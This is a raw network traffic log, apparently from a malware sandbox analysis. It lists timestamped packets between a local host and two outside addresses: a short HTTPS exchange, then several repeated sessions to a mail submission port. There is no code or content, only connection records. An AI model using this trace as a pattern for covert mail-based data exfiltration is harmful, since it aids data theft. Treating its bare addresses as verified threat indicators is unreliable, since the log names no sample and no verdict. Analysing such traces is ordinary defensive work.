                                                                                                        Nov 21, 2024 09:04:36.209990025 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:36.210226059 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:36.214756012 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:36.214767933 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:36.215046883 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:36.261200905 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:36.280864000 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:36.327323914 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:36.662652969 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:36.662719965 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:36.662794113 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:36.665747881 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:37.207448006 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:37.327136040 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:37.327228069 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:38.966546059 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:38.966829062 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:39.086397886 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:39.414102077 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:39.414535999 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:39.534615040 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:39.863493919 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:39.864068985 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:39.983706951 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:40.313905001 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:40.313954115 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:40.313967943 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:40.313980103 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:40.314013004 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:40.314054966 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:40.318181992 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:40.437818050 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:40.765794039 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:40.808156013 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:40.810499907 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:40.930006981 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:41.257498026 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:41.259820938 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:41.379426003 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:41.707094908 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:41.707516909 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:41.827234983 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:42.186959028 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:42.187335014 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:42.307045937 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:42.653851032 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:42.654104948 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:42.773775101 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:43.198847055 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:43.199310064 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:43.319946051 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:43.647963047 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:43.648607016 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:43.648708105 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:43.648730040 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:43.648752928 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:43.768367052 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:43.768378019 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:43.768384933 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:43.768394947 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:44.749074936 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:44.792498112 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:05:59.748908997 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:05:59.749008894 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:01.057744026 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:01.058990955 CET49738587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:01.177285910 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:01.178436995 CET5874973877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:01.287329912 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:01.406997919 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:01.407092094 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:02.661633015 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:02.661860943 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:02.781572104 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.106633902 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.106847048 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:03.226418018 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.551182985 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.551769018 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:03.671468019 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.998167038 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.998197079 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.998210907 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.998219013 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:03.998327971 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:04.001597881 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:04.121395111 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:04.446257114 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:04.458697081 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:04.578386068 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:04.903270960 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:04.903711081 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:05.023344040 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:05.348253012 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:05.349018097 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:05.468596935 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:05.814835072 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:05.817953110 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:05.937536955 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:06.278563023 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:06.278925896 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:06.398431063 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:06.833157063 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:06.833441019 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:06.953097105 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.287421942 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.289565086 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.289649963 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.289717913 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.289717913 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.291182995 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431147099 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431190014 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431200027 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431210041 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431274891 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431328058 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431329012 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431345940 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431427956 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431476116 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431498051 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431590080 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431611061 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431629896 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431653976 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431719065 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431762934 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431773901 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.431832075 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.431907892 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.433506966 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.550961971 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551059961 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551207066 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551208973 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.551335096 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.551470041 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551619053 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551668882 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551713943 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551721096 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.551728010 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551763058 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551791906 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.551839113 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.551882982 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.552999973 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.553121090 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.593611956 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.593924046 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.671022892 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.671154976 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.671210051 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.671222925 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.671271086 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:07.671580076 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.671737909 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.671819925 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.671957970 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672066927 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672199011 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672244072 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672254086 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672359943 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672414064 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672543049 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672622919 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672759056 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.672825098 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.673078060 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.673115015 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.673208952 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.673218966 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.673420906 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.673450947 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.713546991 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.713684082 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.790877104 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.790952921 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.791006088 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.791034937 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.791081905 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:07.791110992 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:08.752799988 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:08.870790958 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:10.124779940 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:10.244399071 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:10.569267035 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:10.569336891 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:10.569406986 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:10.569863081 CET49837587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:10.571046114 CET49856587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:10.690068960 CET5874983777.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:10.691262960 CET5874985677.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:10.691350937 CET49856587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:11.074503899 CET49856587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:11.152921915 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:11.194293976 CET5874985677.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:11.194503069 CET49856587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:11.272489071 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:11.272676945 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:12.571067095 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:12.571366072 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:12.691132069 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.019005060 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.023081064 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:13.142612934 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.470551014 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.471075058 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:13.590605974 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.920393944 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.920478106 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.920495987 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.920556068 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:13.920584917 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:13.920838118 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:13.925167084 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:14.044738054 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:14.372854948 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:14.375360966 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:14.494961977 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:14.822989941 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:14.823338032 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:14.943047047 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:15.270950079 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:15.271475077 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:15.390975952 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:15.731287956 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:15.731523991 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:15.851110935 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:16.188328981 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:16.188533068 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:16.308219910 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:16.728173971 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:16.739454985 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:16.859121084 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.187225103 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.191215038 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.191287041 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.191387892 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.191387892 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.194916964 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.311022997 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.311062098 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.311091900 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.311120987 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.311120987 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.311222076 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.314732075 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.314779043 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.314838886 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.314871073 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.314884901 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.314904928 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.314914942 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.314934015 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.314937115 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.314963102 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.314965010 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.314995050 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.315018892 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.315047026 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.315052986 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.315083027 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.315134048 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.430820942 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.430857897 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.430970907 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.434573889 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.434653997 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.434732914 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.434767008 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.434808969 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.434843063 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.434873104 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.434900045 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.434966087 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.435034990 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.435103893 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.435233116 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.435414076 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.435520887 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.435576916 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.435606003 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.435657978 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.435681105 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.481642008 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.481713057 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.550694942 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.550802946 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.550849915 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.550909996 CET49858587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:06:17.554363012 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.554501057 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.554541111 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.554701090 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.554786921 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.554837942 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.554934978 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555054903 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555212975 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555288076 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555362940 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555392027 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555424929 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555565119 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555593967 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555718899 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555747986 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555783033 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555851936 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.555999041 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.556029081 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.556058884 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.556109905 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.556137085 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.601284027 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.601408958 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.670591116 CET5874985877.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:06:17.670634031 CET5874985877.88.21.158192.168.2.4
